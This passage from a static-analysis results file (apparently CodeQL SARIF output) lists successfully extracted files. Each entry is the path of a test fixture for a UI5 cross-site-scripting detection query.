{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json","uriBaseId":"%SRCROOT%","index":533}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json","uriBaseId":"%SRCROOT%","index":534}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":535}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":536}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":537}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":538}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":540}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json","uriBaseId":"%SRCROOT%","index":541}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":542}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json","uriBaseId":"%SRCROOT%","index":543}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":544}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":545}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":546}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":547}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":548}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":549}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":550}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":551}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json","uriBaseId":"%SRCROOT%","index":552}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json","uriBaseId":"%SRCROOT%","index":553}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":554}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":556}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":557}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":558}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json","uriBaseId":"%SRCROOT%","index":560}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json","uriBaseId":"%SRCROOT%","index":561}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":562}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":563}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":564}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":565}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":566}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json","uriBaseId":"%SRCROOT%","index":568}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json","uriBaseId":"%SRCROOT%","index":569}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml","uriBaseId":"%SRCROOT%","index":570}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":571}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":572}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":573}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html","uriBaseId":"%SRCROOT%","index":574}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js","uriBaseId":"%SRCROOT%","index":575}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":576}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":577}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json","uriBaseId":"%SRCROOT%","index":578}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml","uriBaseId":"%SRCROOT%","index":579}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":580}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json","uriBaseId":"%SRCROOT%","index":581}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":582}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html","uriBaseId":"%SRCROOT%","index":584}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js","uriBaseId":"%SRCROOT%","index":585}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":586}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/package.json","uriBaseId":"%SRCROOT%","index":588}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/ui5.yaml","uriBaseId":"%SRCROOT%","index":590}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml","uriBaseId":"%SRCROOT%","index":591}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.html","uriBaseId":"%SRCROOT%","index":592}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js","uriBaseId":"%SRCROOT%","index":593}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":594}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml","uriBaseId":"%SRCROOT%","index":595}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json","uriBaseId":"%SRCROOT%","index":596}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":597}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json","uriBaseId":"%SRCROOT%","index":598}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":599}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":600}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":601}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package-lock.json","uriBaseId":"%SRCROOT%","index":603}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package.json","uriBaseId":"%SRCROOT%","index":604}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/ui5.yaml","uriBaseId":"%SRCROOT%","index":605}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":606}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.html","uriBaseId":"%SRCROOT%","index":607}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js","uriBaseId":"%SRCROOT%","index":608}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":609}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":610}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":611}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":612}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package-lock.json","uriBaseId":"%SRCROOT%","index":613}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package.json","uriBaseId":"%SRCROOT%","index":614}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":